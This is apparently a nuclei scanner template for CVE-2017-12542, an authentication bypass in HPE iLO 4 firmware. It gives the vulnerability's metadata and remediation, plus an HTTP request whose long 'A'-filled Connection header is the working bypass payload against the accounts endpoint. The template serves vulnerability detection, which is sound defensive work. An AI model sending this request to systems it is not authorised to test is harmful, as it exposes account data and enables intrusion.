nuclei-templates/http/cves/2017/CVE-2017-12542.yaml

54 lines
1.8 KiB
YAML

id: CVE-2017-12542
info:
name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass
author: pikpikcu
severity: critical
description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
impact: |
Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.
remediation: |
Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/44005
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
- https://www.exploit-db.com/exploits/44005/
- http://www.securitytracker.com/id/1039222
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2017-12542
epss-score: 0.97353
epss-percentile: 0.99877
cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: hp
product: integrated_lights-out_4_firmware
tags: ilo4,hpe,auth-bypass,edb,cve,cve2017,hp
http:
- method: GET
path:
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
headers:
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
matchers-condition: and
matchers:
- type: word
part: body
words:
- "iLO User"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502201a3e346c6a6b738d9fb52450d9452caafc3f26834b4e89d9df767b914c5efa0c02210089ea3b0ea81e681b48bb853890215506d457b8ea5f1a435889b6707ffeb66ce8:922c64590222798bb761d5b6d8e72950